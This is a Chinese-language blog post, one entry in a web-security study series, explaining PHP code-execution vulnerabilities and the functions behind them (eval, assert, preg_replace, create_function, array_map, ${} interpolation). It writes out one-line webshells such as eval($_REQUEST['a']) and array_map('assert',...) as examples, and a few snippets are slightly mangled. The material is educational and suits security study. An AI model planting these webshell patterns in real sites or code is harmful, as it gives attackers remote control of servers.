代码执行命令

合集 - 网络安全(24)

1.SQL注入2024-08-312.XSS漏洞2024-08-313.文件上传漏洞2024-08-314.CSRF漏洞2024-08-315.SSRF漏洞2024-08-316.文件包含漏洞2024-08-31

7.代码执行命令2024-08-31

8.命令执行漏洞2024-08-319.变量覆盖漏洞2024-08-3110.代码审计笔记2024-08-3111.业务逻辑漏洞2024-09-0212.SRC-漏洞应急响应平台2024-09-0213.信息收集2024-09-0214.反序列化漏洞2024-09-0215.中间件安全2024-09-0216.等级保护基本要求2024-09-0217.应急响应简介2024-09-0218.框架漏洞-RCE2024-09-0219.dc-2靶机2024-09-0220.GOBY联合AWVS2024-09-0221.GOBY联合XRAY2024-09-0222.春秋云镜CVE-2022-29464 （WSO2文件上传漏洞）2024-09-0223.春秋云镜CVE-2022-28525（ED01-CMS v20180505 存在任意文件上传漏洞）2024-09-0224.春秋云镜CVE-2022-285122024-09-02

收起

代码执行漏洞原理： 用户输入的数据被当做后端代码进行执行

//其实一句话木马的本质就是一个代码执行漏洞 用户输入的数据被当做代码进行执行。

在PHP存在诸多函数可以做到代码执行 [注：为了方便此处我把要执行的代码简写为$a] 1、eval($a); //eval是代码执行用的最多的，他可以多行执行 eval($_REQUEST['a']);

2、assert($a)//只能单行执行 assert($_REQUEST['a']) //如何多行执行呢？

写文件然后执行，例如： file_put_contents('1.php','')

3、preg_replace() //正则替换函数，他其实也会产生代码执行 preg_replace('/a/'，'x'，'abc');

4丶create_function() //匿名函数 $a = create_function('$id','echo $id;'); 自定义函数$a echo $a(8); //执行echo $id;因为$id我传参是8所以 echo $id;

5、array_map() //回调函数，调用某个函数。 图片是这个函数的用法，调用cube函数，传参 一句话木马： array_map('assert',array($POST['c'])); array_map($REQUEST['b'],array($_REQUEST['c'])); 请记住：Eval是无法调用的，因为eval比较特殊，不认为是函数，属于特殊写法 call_user_func() 也可回调，回调函数在PHP有很多

PHP版本5.5及其以上版本可以使用

"${phpinfo()}"; => 代码执行phpinfo()

PHP的字符串是可以使用复杂的表达式。例如 ${中间可以写调用的函数} ${phpinfo()}; //可以执行 $a = ${phpinfo()}; //可以执行

__EOF__

本文作者：Crushz
本文链接：https://www.cnblogs.com/Crushz-2024/p/18390455.html
关于博主：Crushz
版权声明：转载请注明来源哟~ QAQ
声援博主：UP UP UP !!!